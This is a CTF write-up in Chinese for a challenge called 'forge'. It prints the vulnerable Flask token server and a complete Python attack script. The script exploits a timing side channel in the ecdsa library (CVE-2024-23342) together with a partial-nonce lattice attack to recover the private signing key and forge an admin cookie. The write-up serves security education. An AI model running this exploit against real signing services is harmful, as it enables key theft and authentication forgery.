ctf-writeups

forge

附件:

from flask import Flask, request, jsonify, render_template, url_for, redirect
from functools import wraps
from ecdsa import SigningKey, SECP256k1
from hashlib import sha256
from random import shuffle, getrandbits, randint
from time import time_ns
import base64
import json
app = Flask(__name__)

with open("private.pem", 'rb') as f:
    pem_data = f.read()
    
sk = SigningKey.from_pem(pem_data)
vk = sk.verifying_key

kbits = 256
train_times = 1
ncount = 1

def get_nbits_k(nbits):
    while True:
        k = getrandbits(nbits)
        if k.bit_length() == nbits:
            return k
            
def verify_token(token):
    try:
        parts = token.split('.')
        if len(parts) != 2:
            return False

        msg = parts[0].encode()
        msg_digest = sha256(msg).digest()
        
        signature = base64.b64decode(parts[1])
        if vk.verify_digest(signature, msg_digest):
            return True
        else:
            return False
    except:
        return False
    

def token_required(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        token = None
        
        if 'token' in request.cookies:
            try:
                token = request.cookies.get('token')
            except:
                return redirect(url_for('failure'))
        
        if not token:
            return redirect(url_for('failure'))
                
        valid = verify_token(token)

        if valid:
            parts = token.split('.')
            payload = parts[0]
            payload = base64.b64decode(payload)
            
            payload_json = json.loads(payload)
            request.user = payload_json["username"]
            return f(*args, **kwargs)
        else:
            return redirect(url_for('failure')) 
        
        
    
    return decorated
    
@app.route('/set_token', methods=['GET', 'POST'])
def set_token():
    if request.method == 'POST':
        token = request.form.get('token')
        response = redirect(url_for('welcome'))
        response.set_cookie('token', token, httponly=True, max_age=24*60*60)
        return response
    else:
        return render_template('set_token.html')
    

@app.route('/')
def index():
    return redirect(url_for('set_token'))    

@app.route('/welcome')
@token_required
def welcome():
    if request.user == "admin":
        return render_template('welcome.html')
    else:
        return redirect(url_for('guest')) 

@app.route('/failure')
def failure():
    return render_template('failure.html')

@app.route('/guest')
def guest():
    return render_template('guest.html')

@app.route('/api/pubkey', methods=['GET'])   
def pubkey():
    return jsonify({'vk': vk.to_string().hex()}), 200

 
@app.route('/api/set_param', methods=['POST'])
def set_param():
    global kbits, train_times, ncount
    print(sk.privkey.secret_multiplier)
    print(kbits, train_times, ncount)
    data = request.get_json()
    kbits = data.get('kbits')
    reason = ""
    if kbits < 240:
        kbits = 256
        reason = "kbits is too small"
    train_times = data.get('train')
    ncount = data.get('ncount')
    return jsonify({'status': 0, 'reason': reason}), 200

@app.route('/api/train', methods=['GET'])
def train():
    message = b"Not your keys, not your coins!"
    message_digest = sha256(message).digest()
    
    nonces = []
    for i in range(ncount):
        k = get_nbits_k(256)
        nonces.append(k)
        k = get_nbits_k(kbits)
        nonces.append(k)
    
    shuffle(nonces)
    
    costs = []
    sigs = []
    for k in nonces:
        tmp = 0
        for i in range(train_times):
            start = time_ns()
            signature = sk.sign_digest(message_digest, k=k)
            end = time_ns()
            tmp += end - start
        
        sigs.append(signature.hex())
        costs.append(tmp)
    
    return jsonify({'costs': costs, "sigs": sigs}), 200
    
if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=5000)

这里的核心问题是,它使用了 ecdsa 库来进行签名,而它是一个不防 timing side channel attack 的实现(见 CVE-2024-23342),本题正是如此。通过 /api/set_param,可以让服务器随机生产 240 位或 256 位的 nonce,然后根据时间的差异来判断它是 240 位还是 256 位的 nonce;如果得到一系列的 240 位的 nonce,就可以用 cuso 进行 ecdsa known partial nonce attack 了,只不过这里知道的是 MSB(高 16 位都是 0),需要求解的就是低 240 位的 nonce 以及私钥。为了判断是 240 位还是 256 位的 nonce,这里用了一个比较粗暴的方法:生成大量的 signature,认为时间最短的那一个 signature 对应的是 240 位的 nonce。当然它不总是准确的,所以写了一个重试,如果 cuso 求解花费时间太长,就重来。可惜的是,即使本地打出来了,由于现场时间有限,还是没有拿到分数。

攻击代码:

# need: sagemath, ecdsa, cuso from https://github.com/keeganryan/cuso
from hashlib import sha256
import json
import numpy as np
import ecdsa
import signal
from ecdsa.keys import _truncate_and_convert_digest
from ecdsa import SECP256k1
from ecdsa.util import sigdecode_string
from sage.all import var
import cuso
from pwn import *
import requests
import tqdm


url = "http://127.0.0.1:5000"  # CHANGEME


def handler(signum, frame):
    raise Exception("Timeout")


signal.signal(signal.SIGALRM, handler)

while True:
    n = int(SECP256k1.order)
    r = requests.post(
        f"{url}/api/set_param",
        json={
            "kbits": 240,
            "ncount": 1000,
            "train": 1,
        },
    )
    print(r)

    # get random numbers
    replys = []
    samples = []
    for i in tqdm.trange(10000):
        r = requests.get(
            f"{url}/api/train",
        )
        reply = r.json()
        replys.append(reply)
        print(reply)

        costs = reply["costs"]
        sigs = reply["sigs"]

        index = np.argmin(costs)
        sig = sigs[index]

        r, s = sigdecode_string(bytes.fromhex(sig), SECP256k1.order)
        samples += [(r, s)]

        if len(samples) == 17:
            break

    message = b"Not your keys, not your coins!"
    message_digest = sha256(message).digest()
    h = _truncate_and_convert_digest(message_digest, SECP256k1, True)

    # from cuso
    x = var("x")
    relations = []
    bounds = {x: (0, n)}
    for i, (r_i, s_i) in enumerate(samples):
        k_i_lsb = var(f"k_{i}_lsb")

        k_i = k_i_lsb

        # ECDSA equation s == k^-1 (h + rx)
        rel = s_i * k_i == h + r_i * x

        relations += [rel]
        bounds[k_i_lsb] = (0, 2**240)

    print("Got", len(samples), "samples")
    print("Solving, stop if it is too slow")
    # timeout 5s
    signal.alarm(5)
    try:
        roots = cuso.find_small_roots(
            relations=relations,
            bounds=bounds,
            modulus=n,
        )
        signal.alarm(0)
    except Exception:
        print("Timeout, retry")
        signal.alarm(0)
        continue
    x = roots[0][x]
    print(x)
    sk = ecdsa.SigningKey.from_secret_exponent(x, SECP256k1, hashfunc=hashlib.sha256)

    # forge
    msg = json.dumps({"username": "admin"}).encode()
    msg_digest = sha256(base64.b64encode(msg)).digest()
    signature = sk.sign_digest(msg_digest)
    cookie = f"{base64.b64encode(msg).decode()}.{base64.b64encode(signature).decode()}"
    print(msg, signature)
    r = requests.get(f"{url}/welcome", headers={"Cookie": f"token={cookie}"})
    print(r.text)
    print(f"Cookie: token={cookie}")
    break